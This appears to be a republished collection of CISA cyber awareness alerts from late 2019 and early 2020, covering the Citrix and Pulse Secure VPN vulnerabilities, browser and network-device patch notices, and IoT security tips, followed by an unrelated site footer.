  • Review CISA’s Cyber Essentials. CISA’s Cyber Essentials is a guide for leaders of small businesses as well as leaders of small and local government agencies to develop an actionable understanding of where to start implementing organizational cybersecurity practices. Essentials are the starting point to cyber readiness. To download the guide, visit: https://www.cisa.gov/publication/cisa-cyber-essentials.

References

Revisions

  • January 14, 2020: Initial version

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/13/2020 02:03 PM EST
Original release date: January 13, 2020

The Cybersecurity and Infrastructure Security Agency (CISA) has released a utility that enables users and administrators to test whether their Citrix Application Delivery Controller (ADC) and Citrix Gateway software is susceptible to the CVE-2019-19781 vulnerability. According to Citrix Security Bulletin CTX267027, beginning on January 20, 2020, Citrix will be releasing new versions of Citrix ADC and Citrix Gateway that will patch CVE-2019-19781.

CISA strongly advises affected organizations to review CERT/CC’s Vulnerability Note VU#619785 and Citrix Security Bulletin CTX267027 and apply the mitigations until Citrix releases new versions of the software.

This product is provided subject to this Notification and this Privacy & Use policy.


 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/10/2020 06:45 AM EST
Original release date: January 10, 2020

Summary

Unpatched Pulse Secure VPN servers continue to be an attractive target for malicious actors. Affected organizations that have not applied the software patch to fix a remote code execution (RCE) vulnerability, known as CVE-2019-11510, can become compromised in an attack. [1]

Although Pulse Secure [2] disclosed the vulnerability and provided software patches for the various affected products in April 2019, the Cybersecurity and Infrastructure Security Agency (CISA) continues to observe wide exploitation of CVE-2019-11510. [3] [4] [5]

CISA expects to see continued attacks exploiting unpatched Pulse Secure VPN environments and strongly urges users and administrators to upgrade to the corresponding fixes. [6]

Timelines of Specific Events

  • April 24, 2019 – Pulse Secure releases initial advisory and software updates addressing multiple vulnerabilities.
  • May 28, 2019 – Large commercial vendors get reports of vulnerable VPN through HackerOne.
  • July 31, 2019 – Full RCE use of exploit demonstrated using the admin session hash to get complete shell.
  • August 8, 2019 – Meh Chang and Orange Tsai demonstrate the VPN issues across multiple vendors (Pulse Secure) with detailed attack on active VPN exploitation.
  • August 24, 2019 – Bad Packets identifies over 14,500 vulnerable VPN servers globally still unpatched and in need of an upgrade.
  • October 7, 2019 – The National Security Agency (NSA) produces a Cybersecurity Advisory on Pulse Secure and other VPN products being targeted actively by advanced persistent threat actors.
  • October 16, 2019 – The CERT Coordination Center (CERT/CC) releases Vulnerability Note VU#927237: Pulse Secure VPN contains multiple vulnerabilities.
  • January 2020 – Media reports cybercriminals now targeting unpatched Pulse Secure VPN servers to install REvil (Sodinokibi) ransomware.   

Technical Details

Impact

A remote, unauthenticated attacker may be able to compromise a vulnerable VPN server. The attacker may be able to gain access to all active users and their plain-text credentials. It may also be possible for the attacker to execute arbitrary commands on each VPN client as it successfully connects to the VPN server.

Affected versions:

  • Pulse Connect Secure 9.0R1 - 9.0R3.3
  • Pulse Connect Secure 8.3R1 - 8.3R7
  • Pulse Connect Secure 8.2R1 - 8.2R12
  • Pulse Connect Secure 8.1R1 - 8.1R15
  • Pulse Policy Secure 9.0R1 - 9.0R3.1
  • Pulse Policy Secure 5.4R1 - 5.4R7
  • Pulse Policy Secure 5.3R1 - 5.3R12
  • Pulse Policy Secure 5.2R1 - 5.2R12
  • Pulse Policy Secure 5.1R1 - 5.1R15

Mitigations

This vulnerability has no viable workarounds except for applying the patches provided by the vendor and performing required system updates.

CISA strongly urges users and administrators to upgrade to the corresponding fixes. [7]

References

Revisions

  • January 10, 2020: Initial Version

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/08/2020 11:21 AM EST
Original release date: January 8, 2020

Mozilla has released security updates to address vulnerabilities in Firefox and Firefox ESR. An attacker could exploit some of these vulnerabilities to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Mozilla Security Advisories for Firefox 72 and Firefox ESR 68.4 and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/08/2020 11:05 AM EST
Original release date: January 8, 2020

Google has released security updates for Chrome version 79.0.3945.117 for Windows, Mac, and Linux. This version addresses a vulnerability that an attacker could exploit to take control of an affected system.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Chrome Release and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.


Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/08/2020 03:33 PM EST
Original release date: January 8, 2020

The CERT Coordination Center (CERT/CC) has released information on a vulnerability affecting Citrix Application Delivery Controller and Citrix Gateway. A remote attacker could exploit this vulnerability to run arbitrary code on a targeted system. This vulnerability was detected in exploits in the wild.   

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review CERT/CC’s Vulnerability Note VU#619785 and Citrix Security Bulletin CTX267027 for more information and workarounds.

This product is provided subject to this Notification and this Privacy & Use policy.

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/08/2020 02:58 PM EST
Original release date: January 8, 2020

Mozilla has released security updates to address a vulnerability in Firefox and Firefox ESR. An attacker could exploit this vulnerability to take control of an affected system. This vulnerability was detected in exploits in the wild.

The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Mozilla Security Advisory for Firefox 72.0.1 and Firefox ESR 68.4.1 and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/09/2020 10:41 AM EST
Original release date: January 9, 2020

Cisco has released security updates to address vulnerabilities in Cisco Webex Video Mesh, Cisco IOS, and Cisco IOS XE Software. A remote attacker could exploit these vulnerabilities to take control of an affected system. For updates addressing lower severity vulnerabilities, see the Cisco Security Advisories webpage.
 
The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Cisco Webex Video Mesh Advisory and the Cisco IOS and IOS XE Software Advisory and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/09/2020 10:56 AM EST
Original release date: January 9, 2020

Juniper Networks has released security updates to address multiple vulnerabilities in various Juniper products. A remote attacker could exploit some of these vulnerabilities to take control of an affected system.
 
The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the Juniper Security Advisories webpage and apply the necessary updates.

This product is provided subject to this Notification and this Privacy & Use policy.

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

01/07/2020 11:01 AM EST
Original release date: January 7, 2020

Cisco has released security updates to address multiple vulnerabilities in Data Center Network Manager (DCNM). A remote attacker could exploit these vulnerabilities to take control of an affected system. For updates addressing lower severity vulnerabilities see the Cisco Security Advisories webpage.
 
The Cybersecurity and Infrastructure Security Agency (CISA) encourages users and administrators to review the following Cisco advisories and apply the necessary updates:

This product is provided subject to this Notification and this Privacy & Use policy.

 

 

Cybersecurity and Infrastructure Security Agency Logo

National Cyber Awareness System:

12/31/2019 01:44 PM EST
Original release date: December 31, 2019

During the holidays, internet-connected devices—also known as Internet of Things (IoT) devices—are popular gifts. These include smart cameras, smart TVs, watches, toys, phones, and tablets. Although this technology provides added convenience to our lives, it often requires that we share personal and financial information over the internet. The security of this information, and the security of these devices, is not guaranteed. For example, vendors often store personal information in databases, which may be vulnerable to cyberattacks or unintentionally exposed to the internet. Information breaches or leaks can enable malicious cyber actors to engage in identify theft and phishing scams.

The Cybersecurity and Infrastructure Security Agency (CISA) recommends users review CISA Tips on Securing the Internet of Things, Preventing and Responding to Identity Theft, and Avoiding Social Engineering and Phishing Attacks, as well as the following steps to make IoT devices more secure:

  • Use multi-factor authentication when available. Many manufacturers offer users the option to protect accounts with multi-factor authentication (MFA). MFA adds another layer of security and can significantly reduce the impact of a password compromise because the malicious cyber actor needs the other factor—often the user’s mobile phone—for authentication. See Supplementing Passwords for more information.
  • Use strong passwords. Passwords are a common form of authentication and are often the only barrier between you and your personal information. Some internet-enabled devices are configured with default passwords to simplify setup. These default passwords are easily found online, so they don't provide any protection. Choose strong passwords to help secure your device. See Choosing and Protecting Passwords for more information.
  • Evaluate your security settings. Most devices offer a variety of features that you can tailor to meet your needs and requirements. Enabling certain features to increase convenience or functionality may leave you more at risk. It is important to examine the settings—particularly security settings—and select options that meet your needs without putting you at increased risk. If you install a patch or a new version of software, or if you become aware of something that might affect your device, reevaluate your settings to make sure they are still appropriate. See Good Security Habits for more information.
  • Ensure you have up-to-date software. When manufacturers become aware of vulnerabilities in their products, they often issue patches to fix the problem. Patches are software updates that fix a particular issue or vulnerability within your device’s software. Make sure to apply relevant patches as soon as possible to protect your devices. See Understanding Patches for more information.
  • Connect carefully. Once your device is connected to the internet, it’s also connected to millions of other computers, which could allow attackers access to your device. Consider whether continuous connectivity to the internet is necessary. If it isn’t, disconnect. See Home Network Security for more information.

This product is provided subject to this Notification and this Privacy & Use policy.


  

 

 

 

©1973-2020 Human Utilities Whole Armour®

"In a world of lack, Human Utilities Whole Armour® is the world's Cornucopia."™

All information provided as is provided by the author for information purposes. Any action taken regarding this information is the sole responsibility of the actor no matter what age or educational level.

HUMAN UTILITIES WHOLE ARMOUR® huwhole@huegis.com

"My people are destroyed for lack of knowledge...." Hosea 4:6-7

 Human Utilities Whole Armour®

© 1973-2020 ALL RIGHTS RESERVED